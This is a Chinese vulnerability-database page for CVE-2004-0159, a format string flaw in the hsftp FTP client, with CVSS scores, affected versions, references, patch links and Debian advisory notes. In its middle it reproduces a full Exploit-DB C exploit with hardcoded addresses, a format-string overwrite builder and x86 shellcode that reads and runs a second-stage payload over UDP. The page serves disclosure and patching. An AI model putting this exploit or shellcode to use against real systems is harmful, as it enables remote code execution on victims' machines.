CVE-2004-0159
CVSS7.5
发布时间 :2004-03-15 00:00:00
修订时间 :2016-10-17 22:41:17
NMCOES    

[原文]Format string vulnerability in hsftp 1.11 allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via file names containing format string characters that are not properly handled when executing an "ls" command.


[CNNVD]Samhain Labs HSFTP远程格式串处理漏洞(CNNVD-200403-076)

        
        hsftp是一款FTP客户端程序。
        hsftp对特殊文件名缺少正确处理,远程攻击者可以利用这个漏洞对Hsftp程序进行格式串攻击,可能以hsftp进程权限执行任意指令。
        攻击者可以在远程FTP服务器上构造一个带有格式串的特殊文件名的文件,当Hsftp连接并进行目录列表时,可导致内存被覆盖,精心构建文件名数据可能以hsftp进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:samhain_labs:hsftp:1.10
cpe:/a:samhain_labs:hsftp:1.11
cpe:/a:samhain_labs:hsftp:1.4
cpe:/a:samhain_labs:hsftp:1.7
cpe:/a:samhain_labs:hsftp:1.5
cpe:/a:samhain_labs:hsftp:1.6
cpe:/a:samhain_labs:hsftp:1.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0159
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0159
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-076
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017737.html
(UNKNOWN)  FULLDISC  20040223 Re: [SECURITY] [DSA 447-1] New hsftp packages fix format string vulnerability
http://marc.info/?l=bugtraq&m=107755803218677&w=2
(UNKNOWN)  DEBIAN  DSA-447
http://www.securityfocus.com/bid/9715
(VENDOR_ADVISORY)  BID  9715
http://xforce.iss.net/xforce/xfdb/15276
(VENDOR_ADVISORY)  XF  hsftp-format-string(15276)

- 漏洞信息

Samhain Labs HSFTP远程格式串处理漏洞
高危 输入验证
2004-03-15 00:00:00 2005-10-12 00:00:00
本地  
        
        hsftp是一款FTP客户端程序。
        hsftp对特殊文件名缺少正确处理,远程攻击者可以利用这个漏洞对Hsftp程序进行格式串攻击,可能以hsftp进程权限执行任意指令。
        攻击者可以在远程FTP服务器上构造一个带有格式串的特殊文件名的文件,当Hsftp连接并进行目录列表时,可导致内存被覆盖,精心构建文件名数据可能以hsftp进程权限执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Ulf Harnhammar提供如下补丁程序:
        
        http://www.securityfocus.com/data/vulnerabilities/patches/hsftp.patch

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2004/dsa-447

- 漏洞信息 (23740)

Samhain Labs 1.x HSFTP Remote Format String Vulnerability (EDBID:23740)
linux local
2004-02-23 Verified
0 priest@priestmaster.org
N/A [点击下载]
source: http://www.securityfocus.com/bid/9715/info

hsftp has been found to be prone to a remote print format string vulnerability. This issue is due to the application improper use of a format printing function.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected software, which would occur in the security context of the server process.

// priestmasters hsftp <=1.11 remote format string exploit
// mail: priest@priestmaster.org
// url: http://www.priestmaster.org
// I know, it have not any command line parameter (I use #define AAA).
// I do not calculate the values for the format string and so on,
// But it works, if you follow the steps in the README file.
// This exploit is very ugly but I'm very busy. Sorry

#include <stdio.h>

#define PORT    "\x34\x12"		// Udp port 13330
					// You can use other ports,
					// if you want.

// Change it with your values
#define FPUTCGOT	0x0804e1dc	// Got of fputc
#define RETADDR		0xbffff660	// return address
#define PADDING		0		
#define STACKPOP	10
#define FMTNUM1		60000		// First number for short write
#define FMTNUM2		50000		// Second number for short write

// This works only with hsftp 1.11 SUSE 7.0 compiled from source.
/* #define FPUTCGOT	0x0804e1dc	// deregister frame pointer 
					// GOT, dtor are also possible
#define RETADDR		0xbffff660	// Shellcode location

#define PADDING		0		// Padding
#define STACKPOP	10		// How many %x needed

#define FMTNUM1		62864
#define FMTNUM2		51615 */

////////////////////////////////////////////////////////////////////////////

#define NOP		'G'
#define DUMMY		'A'
#define NOPSPACE	140

/**
 ** Linux/x86 udp + read + exec shellcode (c) gunzip
 **
 ** reads from udp port 13330 another shellcode then executes it
 **
 ** 1. Udp is usually not filtered
 ** 2. You can send very big shellcode (size <= 65535)
 ** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
 ** 4. Your sent shellcodes can contain any char ( 0x00 too )
 ** 5  You can send a whole shell script to execute with a command code
 ** 6. Does not contain CR, LF, spaces, slashes and so on
 ** 7. No need to search for file descriptors
 **
 ** gunzip@ircnet <techieone@softhome.net>
 ** http://members.xoom.it/gunzip
**/

char shellcode[]=
        "\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
        "\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
        "\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
        "\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";


main()
{
	char xplbuf[BUFSIZ];	// Our exploit buffer
	char *p = xplbuf;	// Our exploit pointer

	// Null terminate the string
	memset(p, 0x00, BUFSIZ);

	// Make the padding:
	memset(p, DUMMY, PADDING);
	p += PADDING;

	// Copy the return Address with Junk to xplbuf
	*((void **)p) = (void *) FPUTCGOT;
	p += 4;
	*((void **)p) = (void *) FPUTCGOT+2;
	p += 4;

	// Create the nops
	memset(p, NOP, NOPSPACE);
	p += NOPSPACE;

	// Copy shellcode
	memcpy(p, shellcode, strlen(shellcode));
	p += strlen(shellcode);

	// Create format string
	sprintf(p, "%%%dx%%%d$hn%%%dx%%%d$hn", FMTNUM1, STACKPOP, FMTNUM2, STACKPOP+1);
	
	// Print the whole string
	printf("%s", xplbuf);
}
		

- 漏洞信息

4029
Hsftp Filename Format String
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Hsftp contains a flaw that may allow a malicious user to execute arbitrary code on the client machine. The issue is triggered when the client user lists the contents of a directory which contains a maliciously crafted filename. It is possible that the flaw may allow execution of arbitrary code resulting in a loss of confidentiality and integrity.

- 时间线

2004-02-23 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Users of Hsftp 1.14 are counseled to connect only to trusted servers.

- 相关参考

- 漏洞作者

- 漏洞信息

Samhain Labs HSFTP Remote Format String Vulnerability
Input Validation Error 9715
No Yes
2004-02-23 12:00:00 2009-07-12 03:06:00
Discovery of this issue has been credited to Ulf Harnhammar.

- 受影响的程序版本

Samhain Labs hsftp 1.14
Samhain Labs hsftp 1.13
Samhain Labs hsftp 1.11
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Samhain Labs hsftp 1.10
Samhain Labs hsftp 1.9
Samhain Labs hsftp 1.7
Samhain Labs hsftp 1.6
Samhain Labs hsftp 1.5
Samhain Labs hsftp 1.4
hsftp hsftp 1.14
hsftp hsftp 1.13
hsftp hsftp 1.11
hsftp hsftp 1.10
hsftp hsftp 1.9
hsftp hsftp 1.7
hsftp hsftp 1.6
hsftp hsftp 1.5
hsftp hsftp 1.4

- 漏洞讨论

hsftp has been found to be prone to a remote print format string vulnerability. This issue is due to the application improper use of a format printing function.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected software, which would occur in the security context of the server process.

- 漏洞利用

Exploit code has been provided by priestmaster &lt;priest@priestmaster.org&gt;.

- 解决方案

The vendor has reportedly addressed this issue in the upstream version 1.14.

Debian has released advisory DSA 447-1 dealing with this issue. Please see the reference section for more details.

Fixes:


Samhain Labs hsftp 1.11

hsftp hsftp 1.11

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站